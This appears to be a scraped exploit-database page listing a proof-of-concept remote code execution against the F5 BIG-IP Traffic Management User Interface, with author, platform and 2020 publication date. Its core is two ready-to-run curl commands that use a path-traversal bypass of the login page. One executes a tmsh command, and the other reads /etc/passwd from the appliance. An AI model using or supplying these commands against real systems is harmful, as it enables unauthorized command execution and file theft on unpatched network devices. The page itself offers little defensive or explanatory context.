Search for hundreds of thousands of exploits

"BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC)"

Author

Exploit author

"Budi Khoirudin"

Platform

Exploit platform

linux

Release date

Exploit published date

2020-07-05

1
2
3
4
5
6
7
## RCE: 

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

## Read File: 

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48643/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.